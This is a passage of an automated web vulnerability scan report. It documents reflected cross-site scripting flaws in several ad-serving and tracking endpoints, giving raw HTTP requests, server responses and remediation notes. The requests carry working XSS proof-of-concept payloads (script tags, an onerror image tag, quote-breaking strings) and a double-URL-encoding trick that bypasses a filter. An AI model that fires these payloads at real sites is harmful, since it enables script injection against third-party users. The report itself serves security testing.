GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ96c1d"-alert(1)-"ac8d47e6ca4&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:53:26 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81851%2522%253balert%25281%2529%252f%252faa8ae4a84fa was submitted in the REST URL parameter 2. This input was echoed as 81851";alert(1)//aa8ae4a84fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135781851%2522%253balert%25281%2529%252f%252faa8ae4a84fa/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:54:26 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e6b8%2522%253balert%25281%2529%252f%252f7ebd7131956 was submitted in the REST URL parameter 3. This input was echoed as 3e6b8";alert(1)//7ebd7131956 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x303e6b8%2522%253balert%25281%2529%252f%252f7ebd7131956/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:54:32 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c105a"-alert(1)-"fb1bd8b3ce2 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488c105a"-alert(1)-"fb1bd8b3ce2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:53:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f5e6"-alert(1)-"d81f699c354 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G2f5e6"-alert(1)-"d81f699c354&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:52:59 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b539"-alert(1)-"67ea36dc1c6 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4b539"-alert(1)-"67ea36dc1c6&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:52:40 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
1.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7423b"-alert(1)-"cb6a6387cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&7423b"-alert(1)-"cb6a6387cd=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:54:10 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1682
1.56. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.yieldmanager.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf0da"-alert(1)-"8c42b551633 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepage§ion_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/n%3B228957569%3B0-0%3B0%3B45421688%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f&bf0da"-alert(1)-"8c42b551633=1 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/dmd.ehow/homepage;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#M*E!!E)$!$XwU!/uG1!%:2w!#:m1!?5%!'2gi6!xSD7!%4=%!%@78!'>cr~~~~~<jbOF<ka5`~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~"; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; ih="b!!!!9!(4vA!!!!#<kc#t!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!0>0V!!!!#<l/M."; bh="b!!!#t!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!'<l/M+!#MTF!!!!'<l/M+!#MTH!!!!'<l/M+!#MTI!!!!'<l/M+!#MTJ!!!!'<l/M+!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#RY.~~!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!#<l/M+!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!'<l/M+!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%~~!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo~~!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h~~!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b~~!#p]T!!!!$<kL2n"; lifb=%y_Qs7i<Qa5p0/:
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:29:57 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT Cache-Control: no-store Last-Modified: Wed, 02 Feb 2011 15:29:57 GMT Pragma: no-cache Content-Length: 4542 Age: 0 Proxy-Connection: close
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=300x250&bf0da"-alert(1)-"8c42b551633=1&click=http%3a%2f%2fad.doubleclick.net%2fclick%3Bh%3Dv8%2f3aa2%2f3%2f0%2f%2a%2fn%3B228957569%3B0%2d0%3B0%3B45421688%3B4307%2d300%2f250%3B38375088%2f38392845%2f1%3B%3B%7Eaopt%3D2%2f0%2f36%2f0%3B%7Essc ...[SNIP]...
The value of the &q request parameter is copied into the HTML document as plain text between tags. The payload bdab1<img%20src%3da%20onerror%3dalert(1)>4640eb6d92 was submitted in the &q parameter. This input was echoed as bdab1<img src=a onerror=alert(1)>4640eb6d92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 4d05c<script>alert(1)</script>0e5436c2494 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a3673474d05c<script>alert(1)</script>0e5436c2494&callback=Demdex.parseBizo HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7& Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Wed, 02 Feb 2011 15:29:30 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Content-Length: 92 Connection: keep-alive
Unknown API key: (6332f8b7316a4d1284e9c1217a3673474d05c<script>alert(1)</script>0e5436c2494)
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 33b74<script>alert(1)</script>22bbeb83d65 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347&callback=Demdex.parseBizo33b74<script>alert(1)</script>22bbeb83d65 HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7& Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie
Response
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: application/json Date: Wed, 02 Feb 2011 15:29:36 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 Set-Cookie: 